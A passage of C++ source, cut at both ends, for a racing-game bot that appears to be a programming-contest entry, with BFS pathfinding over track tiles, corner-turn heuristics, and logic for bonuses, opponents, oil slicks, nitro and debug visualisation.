++i)\r\n wp.push_back(wp[i]);\r\n int fi, fj, pi, pj;\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex + 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n pair<int, int> S = make_pair(si, sj);\r\n visited[si][sj] = true;\r\n vector<int> qwerqsdfgsdf = {si, sj};\r\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\r\n {\r\n once[si][sj] = true;\r\n for (int i = 0; i < visited.size(); ++i)\r\n for (int j = 0; j < visited[0].size(); ++j)\r\n visited[i][j] = false;\r\n }\r\n if (bad.find(S) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\", si, sj, tti, ttj, waypointIndex);\r\n#endif\r\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\r\n {\r\n vector<pair<int, int>> path;\r\n while (u != si || v != sj)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back({si, sj});\r\n reverse(path.begin(), path.end());\r\n return path;\r\n 
};\r\n auto bfs = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n int u, v, prevD, prevprevD;\r\n while (q.size())\r\n {\r\n u = q.front().x;\r\n v = q.front().y;\r\n prevD = q.front().qd;\r\n prevprevD = q.front().qpd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n {\r\n int isReverse = opposite(prevD, iAmIdiot);\r\n int isShpilka = opposite(prevprevD, iAmIdiot);\r\n int temp = d[u][v] + 1 + isShpilka * 3 + isReverse * 6;\r\n if (d[u + dx[i]][v + dy[i]] > temp)\r\n {\r\n d[u + dx[i]][v + dy[i]] = temp;\r\n prev[u + dx[i]][v + dy[i]] = {u, v};\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n }\r\n }\r\n return make_pair(d, prev);\r\n };\r\n auto qqwerwer = bfs(si, sj, ti, tj, pd, d, FUUUUU);\r\n auto d = qqwerwer.first;\r\n int u, v;\r\n auto prev = qqwerwer.second;\r\n {\r\n u = tti;\r\n v = ttj;\r\n //ppp(d);\r\n int known = 10000;\r\n if (d[tti][ttj] != 10000)\r\n known = fffpath(si, sj, tti, ttj, bfs(si, sj, tti, ttj, pd, dd, FUUUUU).second).size();\r\n int ytrewq = d[tti][ttj] == 10000 || (known / 2 > (abs(si - tti) + abs(sj + ttj)));\r\n if (ytrewq)\r\n {\r\n int indexi = -1;\r\n int indexj = -1;\r\n int mn = 11234123;\r\n for (int i = 0; i < d.size(); ++i)\r\n for (int j = 0; j < d[0].size(); ++j)\r\n if (d[i][j] < 10000)\r\n {\r\n int length = fffpath(si, sj, i, j, bfs(si, sj, i, j, 
pd, dd, FUUUUU).second).size();\r\n bool hasGoodNeighbor = false;\r\n for (int dx = -1; dx < 2; ++dx)\r\n for (int dy = -1; dy < 2; ++dy)\r\n if (abs(dx + dy) == 1)\r\n hasGoodNeighbor |= ok(i + dx, a.size()) && ok(j + dy, a[0].size()) && a[i + dx][j + dy] == UNKNOWN;\r\n#ifdef vis\r\n if (hasGoodNeighbor)\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0xff00ff);\r\n else\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0x00ffff);\r\n#endif\r\n int gamno = abs(i - tti) + abs(j - ttj) + length;\r\n if ((gamno < mn || (gamno == mn && abs(si - i) + abs(sj - j) < abs(si - indexi) + abs(sj - indexj))) && !visited[i][j] && hasGoodNeighbor)\r\n mn = gamno,\r\n indexi = i,\r\n indexj = j;\r\n }\r\n if (indexi == -1)\r\n cout << \"FAAAAAAAAAAAAAIL\\n\";\r\n else\r\n //cout << \"indices == \" << indexi << \" \" << indexj << \"\\n\",\r\n u = ti = indexi,\r\n v = tj = indexj,\r\n#ifdef vis\r\n visual.fillCircle(getCenter(tti), getCenter(ttj), 600, 0x555555),\r\n#endif\r\n targetX = getCenter(ti),\r\n targetY = getCenter(tj);\r\n }\r\n auto path = fffpath(si, sj, u, v, prev);\r\n if (ytrewq)\r\n path.push_back({-1, -1});\r\n return path;\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path;\r\n int qqq = ti;\r\n int www = tj;\r\n path = getPath(si, sj, ti, tj, pd, d, FU);\r\n for (int i = 0; i + 4 < min(7, int(path.size())); ++i)\r\n if (\r\n (\r\n isVertical(path[i + 0], path[i + 1]) &&\r\n isVertical(path[i + 2], path[i + 3]) &&\r\n isHorizontal(path[i + 0], path[i + 3]) &&\r\n isHorizontal(path[i + 1], path[i + 2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[i + 0], path[i + 1]) &&\r\n isHorizontal(path[i + 2], path[i + 3]) &&\r\n isVertical(path[i + 0], path[i + 3]) &&\r\n isVertical(path[i + 1], path[i + 2])\r\n )\r\n )\r\n {\r\n path = getPath(si, sj, qqq, www, pd, d, goforward);\r\n break;\r\n }\r\n //cout << \"RAW PATH = \\n\" << path;\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n auto banana = path.back();\r\n if (banana.first == 
-1)\r\n path.pop_back();\r\n else\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n banana = path.back();\r\n if (banana.first == -1)\r\n path.pop_back();\r\n int t = 0;\r\n int y = 0;\r\n auto zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n if (path.size() < 3)\r\n t = d;\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y, FU);\r\n banana = temp.back();\r\n if (banana.first == -1)\r\n temp.pop_back();\r\n if (temp.size() <= 1)\r\n break;\r\n for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n //for (int i = 0; i + 5 < int(path.size()); ++i)\r\n //{\r\n //auto s = path[i];\r\n //auto d = path[i + 1];\r\n //auto f = path[i + 2];\r\n //auto g = path[i + 3];\r\n //auto h = path[i + 4];\r\n //auto j = path[i + 5];\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //cout << \"EPIC WIN\\n\",\r\n //path[i + 2] = {d.first + 1, d.second};\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //path[i + 2] = {d.first + 1, d.second};\r\n\r\n //}\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == 
path[i + 1])\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n //writeln();\r\n //writeln(xxx);\r\n //writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n //cout.flush();\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = path[3];\r\n snake = true;\r\n if (\r\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\r\n )\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n if (d != directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)])\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getCorner(path[0], path[1], 
path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = interpolation(0.6);\r\n bool found = false;\r\n for (int i = 0; i < int(path.size()); ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[max(0, i - 1)].first;\r\n pj = path[max(0, i - 1)].second;\r\n fi = path[min(int(path.size()) - 1, i + 1)].first;\r\n fj = path[min(int(path.size()) - 1, i + 1)].second;\r\n found = true;\r\n break;\r\n }\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n 
//else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n cout.flush();\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (a[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\n lt:\r\n //a[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\n rt:\r\n //a[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\n lb:\r\n //a[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\n rb:\r\n //a[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n th:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\n bh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36) && self.getDistanceTo(b) > tileSize)\r\n 
{\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - height - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n if (is32(path))\r\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\r\n\r\n auto cars = world.getCars();\r\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (Car car : world.getCars())\r\n if (!car.isFinishedTrack() && !car.isTeammate())\r\n if (hypot(car.getSpeedX(), car.getSpeedY()) * 1.2 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10 && world.getTick() > 300)\r\n {\r\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && (self.getDistanceTo(car) > tileSize || speedModule < 10))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n 
double lower2 = car.getY() - height - 15 - car.getWidth();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = car.getY() + height + 15 + car.getWidth();\r\n double cgy = car.getY();\r\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\r\n nextWaypointX = car.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = car.getX() - height - 15 - car.getWidth();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = car.getX() + height + 15 + car.getWidth();\r\n double cgy = car.getX();\r\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\r\n nextWaypointY = car.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n auto os = world.getOilSlicks();\r\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (auto o : os)\r\n {\r\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = o.getY() - height - 15 - o.getRadius();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = o.getY() + height + 15 + o.getRadius();\r\n double cgy = o.getY();\r\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\r\n nextWaypointX = o.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = o.getX() - height - 15 - o.getRadius();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = o.getX() + height + 15 + o.getRadius();\r\n double cgy = o.getX();\r\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\r\n nextWaypointY = o.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\r\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0)\r\n //planB = PLANB,\r\n //power *= -1;\r\n //if (fabs(check) < PI / 3 && planB)\r\n //power *= -1,\r\n //planB = 0;\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (forceBack == 0 && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n //if (planB)\r\n //planB = 0,\r\n //power *= -1,\r\n //forceRight = FORCE_RIGHT;\r\n //else\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n forceSlow = path.size() <= 4 ? 
14 : 100;\r\n if (is4(path))\r\n forceSlow *= 1.5;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.3;\r\n if (is3_2(path))\r\n dd /= 2;\r\n if (is212(path))\r\n dd /= 2;\r\n if (is41(path))\r\n dd *= 1.2;\r\n bool fas = is131(path) && speedModule > 16.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11) || fas)\r\n move.setBrake(true);\r\n }\r\n }\r\n //cout << \"END OF MOVE\\n\";\r\n //cout.flush();\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n if (forceRight == 0 && forceBack == 0 && planB)\r\n {\r\n if (angleToWaypoint > 0)\r\n angleToWaypoint = PI - angleToWaypoint;\r\n else\r\n angleToWaypoint = -PI + angleToWaypoint;\r\n turn = getTurn(32);\r\n //cout << \"PLANB\\n\";\r\n }\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]) && planB == 0)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n bool okSnake = false;\r\n if (snake && path.size() >= 2)\r\n {\r\n int count = 0;\r\n vector<int> fff = {\r\n directions[make_pair(path[0].first - 
path[1].first, path[0].second - path[1].second)],\r\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\r\n };\r\n for (int i = 2; i < path.size(); ++i)\r\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\r\n count++;\r\n else\r\n break;\r\n //cout << count << \"\\n\";\r\n okSnake = count >= 9;\r\n }\r\n if (forceRight == 0 && forceBack == 0 && world.getTick() > 195 && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0)\r\n move.setUseNitro(true);\r\n#ifdef vis\r\n //cout << \"VISUALIZATION\\n\";\r\n //cout.flush();\r\n for (int i = 0; i < a.size(); ++i)\r\n for (int j = 0; j < a[0].size(); ++j)\r\n if (a[i][j] == UNKNOWN)\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xCC0000);\r\n else if (visited[i][j])\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0x008800);\r\n for (auto p : wp)\r\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), 0x0000CC);\r\n\r\n visual.fillRect(get(ti), get(tj), get(ti + 1), get(tj + 1), 0x008888);\r\n visual.endPre();\r\n visual.beginPost();\r\n visual.circle(getCenter(ti), getCenter(tj), 600, 0x54618f);\r\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\r\n char sss[45];\r\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\r\n visual.text(self.getX() + 120, self.getY() + 120, sss);\r\n sss[44] = 0;\r\n //char qqq[35];\r\n //int ttt = 0;\r\n //for (auto ee : bad)\r\n //ttt += sprintf(qqq + ttt, \"%d %d, \", ee.first, ee.second);\r\n //for (int i = 0; i < 35; 